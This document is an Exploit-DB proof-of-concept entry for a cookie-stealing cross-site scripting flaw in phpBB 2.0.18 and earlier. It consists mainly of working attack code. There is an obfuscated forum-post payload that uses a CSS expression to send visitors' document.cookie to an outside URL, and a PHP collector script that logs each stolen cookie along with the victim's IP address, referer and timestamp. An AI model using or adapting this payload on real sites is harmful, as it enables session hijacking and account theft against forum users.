phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure

Author: jet
type: webapps
platform: php
port: 
date_added: 2005-12-20 
date_updated: 2016-06-13 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpBB-2.0.18-files.tar.gz

/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
	-- 'the html is on exploit'

original exploit by:  (cXIb8O3) - 12/16/2005
proof of concept by: jet
	-- http://jet.carbon-4.net/

		develop a pure, lucid mind, not
		depending upon sound, flavor,
		touch, odor, or any quality.
				- the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

c.php:

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>

# milw0rm.com [2005-12-21]